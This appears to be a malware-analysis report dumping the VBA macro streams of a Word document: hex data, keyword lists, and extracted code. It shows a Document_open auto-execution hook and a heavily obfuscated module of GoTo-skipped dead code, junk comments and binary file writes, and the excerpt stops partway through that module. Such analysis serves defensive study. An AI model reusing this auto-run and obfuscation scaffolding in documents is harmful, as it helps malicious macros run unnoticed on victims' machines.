                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 90 4c ad 66 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords: Attribute, VB_Name
VBA Code
Attribute VB_Name = "Avi6wp3s89lev"
VBA File Name: Bj7zc5k612ib, Stream Size: 1162
General
Stream Path: Macros/VBA/Bj7zc5k612ib
VBA File Name: Bj7zc5k612ib
Stream Size: 1162
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L ; g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 3b 67 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords: False, VB_Exposed, Attribute, VB_Name, VB_Creatable, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
VBA Code
Attribute VB_Name = "Bj7zc5k612ib"
Attribute VB_Base = "0{53E03B9E-2218-45B6-85A2-C47D984847B8}{DECDBE84-7493-4018-BC88-15CC72351445}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
VBA File Name: Hiuk_v7ho95scpn0j, Stream Size: 1169
General
Stream Path: Macros/VBA/Hiuk_v7ho95scpn0j
VBA File Name: Hiuk_v7ho95scpn0j
Stream Size: 1169
                                                                                                                        Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                        Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 90 4c 1c c3 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
VBA Code Keywords: VB_Creatable, False, VB_Exposed, Attribute, VB_Name, VB_PredeclaredId, VB_GlobalNameSpace, VB_Base, VB_Customizable, VB_TemplateDerived
VBA Code
Attribute VB_Name = "Hiuk_v7ho95scpn0j"
Attribute VB_Base = "0{DCA2A5D6-E131-4DDA-895B-3E9822E93650}{59CEE0E1-26C4-4583-B7FF-9510385F9059}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Hvp1hxwgx78q8fg4, Stream Size: 1167
                                                                                                                        General
                                                                                                                        Stream Path: Macros/VBA/Hvp1hxwgx78q8fg4
                                                                                                                        VBA File Name: Hvp1hxwgx78q8fg4
                                                                                                                        Stream Size: 1167

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Hvp1hxwgx78q8fg4"
                                                                                                                        Attribute VB_Base = "0{C2BABB20-D2C4-427C-9EDB-4620FFEE0F8C}{14D3B583-866E-4040-A821-3D821B8C0F73}"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = False
                                                                                                                        Attribute VB_TemplateDerived = False
                                                                                                                        Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Ntx3xle2gjt1, Stream Size: 1113
                                                                                                                        General
                                                                                                                        Stream Path: Macros/VBA/Ntx3xle2gjt1
                                                                                                                        VBA File Name: Ntx3xle2gjt1
                                                                                                                        Stream Size: 1113

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        Private
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Creatable
                                                                                                                        VB_Name
                                                                                                                        Document_open()
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        False
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Ntx3xle2gjt1"
                                                                                                                        Attribute VB_Base = "1Normal.ThisDocument"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = True
                                                                                                                        Attribute VB_TemplateDerived = True
                                                                                                                        Attribute VB_Customizable = True
                                                                                                                        Private Sub Document_open()
                                                                                                                        Vj_abq1qp3rat9wz
                                                                                                                        End Sub
                                                                                                                        VBA File Name: Pkebr_y5xjd5hl070, Stream Size: 1167
                                                                                                                        General
                                                                                                                        Stream Path: Macros/VBA/Pkebr_y5xjd5hl070
                                                                                                                        VBA File Name: Pkebr_y5xjd5hl070
                                                                                                                        Stream Size: 1167

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        VB_Exposed
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Pkebr_y5xjd5hl070"
                                                                                                                        Attribute VB_Base = "0{9D897C48-94D7-48BA-981A-540C527DFECB}{D1114CBA-B9B7-4991-84EB-5C5DD038E3F9}"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = False
                                                                                                                        Attribute VB_TemplateDerived = False
                                                                                                                        Attribute VB_Customizable = False
                                                                                                                        VBA File Name: Seby_rq4k8mp, Stream Size: 1164
                                                                                                                        General
                                                                                                                        Stream Path: Macros/VBA/Seby_rq4k8mp
                                                                                                                        VBA File Name: Seby_rq4k8mp
                                                                                                                        Stream Size: 1164

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        False
                                                                                                                        Attribute
                                                                                                                        VB_Name
                                                                                                                        VB_Creatable
                                                                                                                        VB_PredeclaredId
                                                                                                                        VB_GlobalNameSpace
                                                                                                                        VB_Base
                                                                                                                        VB_Customizable
                                                                                                                        VB_TemplateDerived
                                                                                                                        VB_Exposed
                                                                                                                        VBA Code
                                                                                                                        Attribute VB_Name = "Seby_rq4k8mp"
                                                                                                                        Attribute VB_Base = "0{8C08A6E4-D61D-4DFA-9005-995F3C6B461B}{AB11852B-4BC8-48EF-B786-4176F752DCC1}"
                                                                                                                        Attribute VB_GlobalNameSpace = False
                                                                                                                        Attribute VB_Creatable = False
                                                                                                                        Attribute VB_PredeclaredId = True
                                                                                                                        Attribute VB_Exposed = False
                                                                                                                        Attribute VB_TemplateDerived = False
                                                                                                                        Attribute VB_Customizable = False
                                                                                                                        VBA File Name: T1f2hilsywf9dq, Stream Size: 26927
                                                                                                                        General
                                                                                                                        Stream Path: Macros/VBA/T1f2hilsywf9dq
                                                                                                                        VBA File Name: T1f2hilsywf9dq
                                                                                                                        Stream Size: 26927

                                                                                                                        VBA Code Keywords

                                                                                                                        Keyword
                                                                                                                        'rhJGP
                                                                                                                        'XfuFHB
                                                                                                                        'WPxoGFBuC
                                                                                                                        tzmsZ:
                                                                                                                        eLkJvFE:
                                                                                                                        "KmgdV.ZGtAJHtj.ONGSH"
                                                                                                                        "MmewC.AVQUDGmHG.vtFSCPB"
                                                                                                                        'CjTuWXAF
                                                                                                                        "HoPXpGBA.IwHCJMDRA.CmlzH"
                                                                                                                        FIMZH
                                                                                                                        VBA.Replace
                                                                                                                        'AjctARC
                                                                                                                        'GWfMJkw
                                                                                                                        'KfzvA
                                                                                                                        FQNmffWt:
                                                                                                                        'zNzvOPGDA
                                                                                                                        mfYda:
                                                                                                                        'jKGHAcDG
                                                                                                                        'LRtnIrEGf
                                                                                                                        'CgEsJ
                                                                                                                        bsoyVGCFI
                                                                                                                        'hYZyKCqA
                                                                                                                        IOzIsOFA:
                                                                                                                        eLkJvFE
                                                                                                                        pOumBJl
                                                                                                                        hswrCJBk:
                                                                                                                        'nmrXG
                                                                                                                        VrYJTkgJq:
                                                                                                                        'mqsdenJm
                                                                                                                        "OECHJGADF.eWIOVB.CjlHH"
                                                                                                                        GhPWABBAC:
                                                                                                                        TbyMA
                                                                                                                        'rVQfbFK
                                                                                                                        "wLbyGHRF.DHtWiADE.NZhmG"
                                                                                                                        mKReIEI
                                                                                                                        "DGVxCZh.RlEFPCEb.wIwVQJJBo"
                                                                                                                        wdKeyS
                                                                                                                        'aRKWJBBIl
                                                                                                                        'OBuKICGCA
                                                                                                                        RjcPJ
                                                                                                                        'TGIyCPCt
                                                                                                                        'FFDZEEwAF
                                                                                                                        'PLFtB
                                                                                                                        IEMTiUEj
                                                                                                                        'VPxgCoxS
                                                                                                                        VqytEGCGP
                                                                                                                        ufcruVvA
                                                                                                                        LtmnvEE
                                                                                                                        hVZYKBKH
                                                                                                                        TpbnJRCA
                                                                                                                        fYohsF
                                                                                                                        'DXJjIaXwC
                                                                                                                        'YmPlE
                                                                                                                        'nxQwDJhLl
                                                                                                                        sgQCI
                                                                                                                        VAZyEDXCR
                                                                                                                        mMdMmt:
                                                                                                                        GhPWABBAC
                                                                                                                        hBvQG:
                                                                                                                        'PRbiJE
                                                                                                                        'PftIBSAvw
                                                                                                                        aopzzCP:
                                                                                                                        'OYgWDJ
                                                                                                                        JjteHBBVA
                                                                                                                        fVpImB
                                                                                                                        'OjVXMHwrH
                                                                                                                        'prwRBmAPJ
                                                                                                                        "NuPRDAFC.UhBsmID.EkqPGFJEG"
                                                                                                                        'vZGyCMG
                                                                                                                        'lRHQDomqI
                                                                                                                        'cZkrDE
                                                                                                                        mMdMmt
                                                                                                                        Binary
                                                                                                                        'qhIbwt
                                                                                                                        'RIXfe
                                                                                                                        suyzGICEH
                                                                                                                        eQxzwIAB
                                                                                                                        CjlbH
                                                                                                                        NLiHLTcg
                                                                                                                        'rjhOF
                                                                                                                        'uxAOGU
                                                                                                                        "npKeJB.AsJFFIJ.PEOYbGOz"
                                                                                                                        'WdtnHDFqJ
                                                                                                                        'aptRP
                                                                                                                        jzcemJ
                                                                                                                        'xNYzEIOEK
                                                                                                                        ljRDIw
                                                                                                                        'jzyrJEO
                                                                                                                        'tauleK
                                                                                                                        "glqhDDI.CLTNCt.xZeqp"
                                                                                                                        'fbVwYot
                                                                                                                        'oiKxBGHdG
                                                                                                                        'VwqWBynDr
                                                                                                                        'rHFMIEG
                                                                                                                        LxvXa
                                                                                                                        'ffoEJA
                                                                                                                        fZLyN
                                                                                                                        LZRViG
                                                                                                                        'zqGnII
                                                                                                                        'YtYiEC
                                                                                                                        diQYvIIAB
                                                                                                                        yKflP
                                                                                                                        "KjXoEi.VPFBSHI.smiQyd"
                                                                                                                        "YPhnJPEH.HagGFmEIC.cyyfEHaR"
                                                                                                                        vaaYK:
                                                                                                                        'pXFOCJTDH
                                                                                                                        'pfLrHfAD
                                                                                                                        wylCIDDAH
                                                                                                                        'RIxEqh
                                                                                                                        "cRxbPCb.XykXFJGA.LtZggMsGa"
                                                                                                                        'rnAWH
                                                                                                                        'BeGKBDhI
                                                                                                                        'LOwzHdS
                                                                                                                        wpmyAZDbH
                                                                                                                        qiVZhCBpC
                                                                                                                        'hZjGH
                                                                                                                        'XdwIJh
                                                                                                                        HZVSIIU:
                                                                                                                        'uQuAGD
                                                                                                                        'QwSTRP
                                                                                                                        'MQFmHSAB
                                                                                                                        "aejsJk.ugJxod.tsCaOC"
                                                                                                                        'JmNAGIGpg
                                                                                                                        TIucAHET
                                                                                                                        'BIJvaADA
                                                                                                                        'qortGBHFE
                                                                                                                        ZMCcDFc
                                                                                                                        HZVSIIU
                                                                                                                        'waqFE
                                                                                                                        'yJKoGGMCK
                                                                                                                        fRocABAt
                                                                                                                        "VLWvGECBE.hSxDGF.RmBdHqNjD"
                                                                                                                        'sLTHHIdWW
                                                                                                                        'vhHjyA
                                                                                                                        oqOQrACK
                                                                                                                        hswrCJBk
                                                                                                                        'HpPiAJE
                                                                                                                        'QPOFBD
                                                                                                                        PtHzDC
                                                                                                                        flWCjiEl
                                                                                                                        bsoyVGCFI:
                                                                                                                        YEORYFEgD
                                                                                                                        'WLoqEAAE
                                                                                                                        iMqHCHFJ
                                                                                                                        UcOAeq:
                                                                                                                        ZPidFrt
                                                                                                                        'yIpgX
                                                                                                                        'fxyhXM
                                                                                                                        "nOQNGhA.FYVFJ.bklIA"
                                                                                                                        'zXveB
                                                                                                                        WFNTzBZJ
                                                                                                                        'zEBHCjA
                                                                                                                        'PhsrzJ
                                                                                                                        Resume
                                                                                                                        BtpGqEA
                                                                                                                        'CQcUlBY
                                                                                                                        jCSEHHF
                                                                                                                        mjcGEp
                                                                                                                        ZSAiDINAr
                                                                                                                        LwWkX
                                                                                                                        'gOnoJFf
                                                                                                                        kWOHB
                                                                                                                        'evZsEG
                                                                                                                        'VtpqX
                                                                                                                        fYohsF:
                                                                                                                        JQIjO
                                                                                                                        'jXNDJFV
                                                                                                                        UWnPEFF
                                                                                                                        'UEeVHoE
                                                                                                                        omutJ
                                                                                                                        'ODJHAGEBR
                                                                                                                        lyHkDXIOH:
                                                                                                                        IbQUAAA
                                                                                                                        AtpoQEB
                                                                                                                        'qruEHBD
                                                                                                                        cHiYNHFqI
                                                                                                                        'EWzTDA
                                                                                                                        "emmJF.oEJjOD.giiLoEJv"
                                                                                                                        WFNTzBZJ:
                                                                                                                        'VwpCXLA
                                                                                                                        "DgRkGC.oezuIJ.QreJABJlU"
                                                                                                                        'XXZdqPuA
                                                                                                                        bqdcZF
                                                                                                                        'iwAgCMBM
                                                                                                                        pAYVi
                                                                                                                        'tzwDCH
                                                                                                                        'fcWToHE
                                                                                                                        'CaHccmUPa
                                                                                                                        'nWlYeBII
                                                                                                                        zAnUQGvFH
                                                                                                                        BPUIP:
                                                                                                                        'mqLjGXcH
                                                                                                                        mYHbrH
                                                                                                                        'XxlPH
                                                                                                                        'cSOoJx
                                                                                                                        'DwRUIBY
                                                                                                                        'srKQHAJUg
                                                                                                                        UfERFpCEB
                                                                                                                        nXQZvIEA
                                                                                                                        ZJqvCII
                                                                                                                        'QlIJBOHFE
                                                                                                                        "MuBaJAqI.JJwbBIG.xcQNDHA"
                                                                                                                        cnPZICJpM
                                                                                                                        'uNzMTBa
                                                                                                                        YenAEIAp
                                                                                                                        'DghaBJ
                                                                                                                        'TYgFHGIl
                                                                                                                        kwwmA
                                                                                                                        IWrPutAPf
                                                                                                                        HmbOBrAAC
                                                                                                                        bTmHFI
                                                                                                                        ZTXrGl
                                                                                                                        'OUTVQNcP
                                                                                                                        DBkFIE
                                                                                                                        'hjploJG
                                                                                                                        uRYMAlGHA
                                                                                                                        'hVRsJCyE
                                                                                                                        BjSOooFXD
                                                                                                                        'jqWJGRIDF
                                                                                                                        yArxc
                                                                                                                        'miPErfKDG
                                                                                                                        PJctPBAG
                                                                                                                        'KKQcfh
                                                                                                                        "GlzLdHXJB.ukgsrF.MzrWIEjI"
                                                                                                                        jcwCemL:
                                                                                                                        TyAVHBnfu
                                                                                                                        'HHZcMPC
                                                                                                                        XaCoFBkF
                                                                                                                        'HFWLG
                                                                                                                        'ljrRDq
                                                                                                                        'HEedAa
                                                                                                                        'qVFxG
                                                                                                                        'qhNOn
                                                                                                                        'ExinpI
                                                                                                                        'KwXUfSFE
                                                                                                                        'wTpIfC
                                                                                                                        SfMUAAHuE
                                                                                                                        "sVsyIHHN.BqamC.SasWG"
                                                                                                                        MQmKFAAtE
                                                                                                                        lYrlEWq
                                                                                                                        'BWcEdTac
                                                                                                                        'SEHbo
                                                                                                                        MPzbNgEEA:
                                                                                                                        VB_Name
                                                                                                                        NmHsEFc:
                                                                                                                        kwwmA:
                                                                                                                        'UkbtPHpF
                                                                                                                        'jiKjSA
                                                                                                                        VlqRGAP
                                                                                                                        'FiXcEr
                                                                                                                        nbTgII
                                                                                                                        ZXOpRLQFH:
                                                                                                                        KMpoSNLJ
                                                                                                                        MBalHjB:
                                                                                                                        "ufMYp.QtEuJ.OwOyxH"
                                                                                                                        zMifH
                                                                                                                        'DujmQIHr
                                                                                                                        PJxhq
                                                                                                                        YeFQHW:
                                                                                                                        'eCyDVgME
                                                                                                                        'tuqaDL
                                                                                                                        dvGYxIO
                                                                                                                        YeFQHW
                                                                                                                        'pIoCjKh
                                                                                                                        GfmhF
                                                                                                                        yghyBIF
                                                                                                                        'QpqEJ
                                                                                                                        iyQDTCBS
                                                                                                                        pbMAHF
                                                                                                                        "QvCuBxUE.JkVTZJh.XniaV"
                                                                                                                        cnPZICJpM:
                                                                                                                        'YDHVCICC
                                                                                                                        LZRViG:
                                                                                                                        "XBCgYJ.OzLWBT.wAQnUP"
                                                                                                                        'goxvtQ
                                                                                                                        'nuuGL
                                                                                                                        tzmsZ
                                                                                                                        "zaIoLA.TXEWrApGI.WoizH"
                                                                                                                        'ImBjDU
                                                                                                                        NQfbJHA
                                                                                                                        yXjmE
                                                                                                                        'AAbHHB
                                                                                                                        'hBmlufkDC
                                                                                                                        'rGZYAGA
                                                                                                                        'HdkzJJ
                                                                                                                        PtHzDC:
                                                                                                                        'IZCOJ
                                                                                                                        HojJPZ
                                                                                                                        "AigvGEHIB.PPCtCYDWg.gBVHiqCD"
                                                                                                                        CIXpj
                                                                                                                        UcOAeq
                                                                                                                        'PQoLBFA
                                                                                                                        'NqyUCa
                                                                                                                        JGRXFCs
                                                                                                                        'usesJGDt
                                                                                                                        "iPfhytE.BYjiXI.XRadQ"
                                                                                                                        kydQU:
                                                                                                                        'iSldRDWF
                                                                                                                        'bxJMJC
                                                                                                                        'LKuMAFDG
                                                                                                                        'yGoQlC
                                                                                                                        'AEWoE
                                                                                                                        'Kufvu
                                                                                                                        'XwQzzKI
                                                                                                                        'xMdFGb
                                                                                                                        hlWxWgB
                                                                                                                        'ZLyvHz
                                                                                                                        'vNbrJWXFs
                                                                                                                        'MYcqCEL
                                                                                                                        'zOlqpiBE
                                                                                                                        UWnwUuJ
                                                                                                                        khzFG
                                                                                                                        'ILEaPIEWu
                                                                                                                        "BbJaFjST.Xrzpku.uVfFAHQv"
                                                                                                                        WKGKGYA
                                                                                                                        ZJqvCII:
                                                                                                                        OEcMJ
                                                                                                                        'NvHuiCxB
                                                                                                                        'NhgHBItrc
                                                                                                                        'KBdNg
                                                                                                                        AoWWOyA
                                                                                                                        'pTXPAB
                                                                                                                        'UvkYP
                                                                                                                        "xbtmGo.qIuZXGHJ.RZptvtQEG"
                                                                                                                        'eOgqI
                                                                                                                        'FgyIBEFDC
                                                                                                                        'rzTvI
                                                                                                                        'XpVGACJB
                                                                                                                        CAkSJ:
                                                                                                                        'onwEG
                                                                                                                        'shuPKMcWG
                                                                                                                        SELjDEG
                                                                                                                        'jsozCGAK
                                                                                                                        'HwfPAHH
                                                                                                                        "ZVPyGDo.KHVpyJEJI.kpQfJeY"
                                                                                                                        'wBmmODIas
                                                                                                                        'zkyEFz
                                                                                                                        uuXLMGBEg
                                                                                                                        sutvLcBD
                                                                                                                        FIMZH:
                                                                                                                        suyzGICEH:
                                                                                                                        IWrPutAPf:
                                                                                                                        'WUTNECA
                                                                                                                        'HLSxHFmB
                                                                                                                        LtmnvEE:
                                                                                                                        'PQEtNI
                                                                                                                        qjEXJBwE
                                                                                                                        "VVcDBJklB.wcffJ.HXsnGGAHN"
                                                                                                                        qgkvFbl
                                                                                                                        'YYMsAjcB
                                                                                                                        IOzIsOFA
                                                                                                                        'BPXjtGAIo
                                                                                                                        'tADwHZ
                                                                                                                        jcwCemL
                                                                                                                        PJxhq:
                                                                                                                        'LuADIGI
                                                                                                                        "qqPeDr.wSQVWc.pJeJCC"
                                                                                                                        'FoPEe
                                                                                                                        'jttYD
                                                                                                                        MPzbNgEEA
                                                                                                                        CLqtBBHEM
                                                                                                                        'gsWvFVBG
                                                                                                                        'AEWPOk
                                                                                                                        pXLSUvXGL
                                                                                                                        dvGYxIO:
                                                                                                                        'XPjxk
                                                                                                                        'lXFZIIBa
                                                                                                                        DBkFIE:
                                                                                                                        'eBYmHoiBA
                                                                                                                        QHujBIJp
                                                                                                                        XwhzUcG
                                                                                                                        'OrIDw
                                                                                                                        'aDdbIADKD
                                                                                                                        'mlYhn
                                                                                                                        CAkSJ
                                                                                                                        'QlLDIAvHD
                                                                                                                        'aPJwL
                                                                                                                        FQNmffWt
                                                                                                                        'xoPwBUFsA
                                                                                                                        'xCaquG
                                                                                                                        'xODtDoIB
                                                                                                                        'XtrWMG
                                                                                                                        LSgRM:
                                                                                                                        FFWrACDoa
                                                                                                                        'hWWDUDGI
                                                                                                                        'bKUkGluT
                                                                                                                        JrBDIm
                                                                                                                        'GHJdfD
                                                                                                                        "eLPyC.ZdqCDyGC.QcmSHJFJl"
                                                                                                                        "sxxLaTTrF.HCwgq.ncoBz"
                                                                                                                        'NrwxFP
                                                                                                                        'jmKdCK
                                                                                                                        Rlclp:
                                                                                                                        PIypJ
                                                                                                                        lyHkDXIOH
                                                                                                                        GrdEGI
                                                                                                                        'xAmeRH
                                                                                                                        'kKrMDZI
                                                                                                                        'MnKMBVH
                                                                                                                        'JwNLmkpXF
                                                                                                                        'CPbAYBF
                                                                                                                        pbMAHF:
                                                                                                                        'gEdnXGAB
                                                                                                                        'FINeFJHJ
                                                                                                                        'bXsNnAIDE
                                                                                                                        zZMYCtCAX
                                                                                                                        "kLAOAG.wDTBF.VrHOCGc"
                                                                                                                        'hMgWcFF
                                                                                                                        SELjDEG:
                                                                                                                        GrdEGI:
                                                                                                                        nXQZvIEA:
                                                                                                                        pOumBJl:
                                                                                                                        'TJeBj
                                                                                                                        'ByOiG
                                                                                                                        'YiSwI
                                                                                                                        'yKykIcM
                                                                                                                        'FsOpdIsW
                                                                                                                        'tedmJhA
                                                                                                                        'VtriHBIDF
                                                                                                                        'DRUvDhBe
                                                                                                                        RntxcqJq
                                                                                                                        'ZUcAJ
                                                                                                                        'gyHcs
                                                                                                                        ZldpVI
                                                                                                                        "UHYrC.GZeVBEo.SOkEIBXGV"
                                                                                                                        'AlXCVHJ
                                                                                                                        'YEKPB
                                                                                                                        'CedXbS
                                                                                                                        rOzmqEAQ
                                                                                                                        cLvjGII
                                                                                                                        "VqHUG.ZFPuZgUK.BaCFC"
                                                                                                                        'BSjLEB
                                                                                                                        AnoQaAEA
                                                                                                                        RaTSTn
                                                                                                                        BTiPIcSF
                                                                                                                        'iWZQFE
                                                                                                                        mfYda
                                                                                                                        GLLJhAEHI
                                                                                                                        'IaDEIDpI
                                                                                                                        'EGGfGJEqE
                                                                                                                        WrCtJYU
                                                                                                                        "Xfyzv.AwqqF.CSulDx"
                                                                                                                        "xRrfF.YqkEzRF.kLUPqyCFD"
                                                                                                                        VrYJTkgJq
                                                                                                                        "zDQxMR.iplzr.wAjoodIF"
                                                                                                                        'pzbrdFE
                                                                                                                        pAOchCdIA
                                                                                                                        cZYJwJI
                                                                                                                        'BiIID
                                                                                                                        'yrXtA
                                                                                                                        'vAqxFfGB
                                                                                                                        "NhKoBJB.bXBco.DTUxEg"
                                                                                                                        yKflP:
                                                                                                                        "HDCkBsF.dMGCBEF.ufLRD"
                                                                                                                        'bXPvfYuDq
                                                                                                                        'EWHNBIiJN
                                                                                                                        ZXOpRLQFH
                                                                                                                        rtldCJ
                                                                                                                        'IPHiIjJHB
                                                                                                                        'WKjPM
                                                                                                                        'IgidHDSK
                                                                                                                        'kjvAuzEtF
                                                                                                                        'ScQwUADE
                                                                                                                        ZZTnc
                                                                                                                        String
                                                                                                                        MBalHjB
                                                                                                                        'LXLsCICF
                                                                                                                        "QrkQH.tOWCIP.GrDHUJ"
                                                                                                                        'sOIEJIDEW
                                                                                                                        'SEVxED
                                                                                                                        'HNYatJbe
                                                                                                                        'oYfRUCA
                                                                                                                        uweUHDE
                                                                                                                        'UyRrc
                                                                                                                        'vkuNGIJ
                                                                                                                        URTAHB:
                                                                                                                        OEleEeCT
                                                                                                                        "pDOcllCuD.lEzLut.kKCfGuBND"
                                                                                                                        iqyjE
                                                                                                                        'mmrHEDDH
                                                                                                                        UeTMXOrGT
                                                                                                                        'twZWbqGC
                                                                                                                        aopzzCP
                                                                                                                        'DDTfYJV
                                                                                                                        "FgtNVBC.LAhZJM.HJpZQ"
                                                                                                                        nbTgII:
                                                                                                                        "aCKLVJaH.XtEZlTZ.CLelFNHGI"
                                                                                                                        "LQAVC.FldzmI.oCeVXZC"
                                                                                                                        'cBNdBKA
                                                                                                                        'skRUOHGHq
                                                                                                                        "jGlnHJ.WuqlLbxyF.HGhglIF"
                                                                                                                        'VsSPJL
                                                                                                                        'oqezDBJ
                                                                                                                        URTAHB
                                                                                                                        'yubXaIh
                                                                                                                        'MAyDDBNI
                                                                                                                        EzJGE
                                                                                                                        BPUIP
                                                                                                                        KMpoSNLJ:
                                                                                                                        'TYAPZ
                                                                                                                        "EMnBm.qhzCjGG.AdplaCwr"
                                                                                                                        'OtsFHHIG
                                                                                                                        hBvQG
                                                                                                                        'wOOVDAGY
                                                                                                                        kydQU
                                                                                                                        'spWCdHBG
                                                                                                                        "qZLyIGBoG.pxIvxHQJ.ruafsIGOH"
                                                                                                                        Error
                                                                                                                        'cvsnImpIJ
                                                                                                                        'pFplgGAI
                                                                                                                        'OSjhX
                                                                                                                        RdYqcFDJ
                                                                                                                        Attribute
                                                                                                                        "FhCyJa.yKJBb.ijMMEFEqB"
                                                                                                                        'IfSdbRMm
                                                                                                                        Close
                                                                                                                        'eoYuBDfBv
                                                                                                                        Rlclp
                                                                                                                        'RvQwi
                                                                                                                        NmHsEFc
                                                                                                                        'jZarCE
                                                                                                                        'FpVuCCId
                                                                                                                        Function
                                                                                                                        'wdtaBI
                                                                                                                        khzFG:
                                                                                                                        XwhzUcG:
                                                                                                                        LokfC
                                                                                                                        LSgRM
                                                                                                                        'mZoyGC
                                                                                                                        'NDQyFF
                                                                                                                        "lzFAlTr.gioDBGHB.nAGbrAU"
                                                                                                                        'ykZBs
                                                                                                                        iJBKl
                                                                                                                        XkQTmpt
                                                                                                                        FkZyGrH
                                                                                                                        'PQvyIgI
                                                                                                                        'gJqSCzGP
                                                                                                                        hVZYKBKH:
                                                                                                                        'iFuweHbIH
                                                                                                                        "tMHiBAq.JuMHZKNBq.cgyJFF"
                                                                                                                        'eyDfDD
                                                                                                                        NQfbJHA:
'XTltBj
vaaYK
'opupRgM
'PbuDaDAZ
'wEBTBf
'fVXaBt
"DlhFJNHB.bhBvj.BSVeVFGRY"
"OstrD.remYG.TgODSiEJw"
VBA Code
Attribute VB_Name = "T1f2hilsywf9dq"
Function Mrfzpndjp3s0k(Bnivj2ii9s31hmeej0)
   GoTo XwhzUcG
Dim pAYVi As String 'vZGyCMG
Dim BtpGqEA As String 'IfSdbRMm
Open "VVcDBJklB.wcffJ.HXsnGGAHN" For Binary As 247 'HHZcMPC
Put #247, , pAYVi 'nWlYeBII
Close #247 'oYfRUCA
XwhzUcG:
GoTo lyHkDXIOH
Dim flWCjiEl As String 'fcWToHE
Dim AoWWOyA As String 'iWZQFE
Open "emmJF.oEJjOD.giiLoEJv" For Binary As 168 'YmPlE
Put #168, , flWCjiEl 'MnKMBVH
Close #168 'HFWLG
lyHkDXIOH:
GoTo MPzbNgEEA
Dim cZYJwJI As String 'JmNAGIGpg
Dim kWOHB As String 'qhNOn
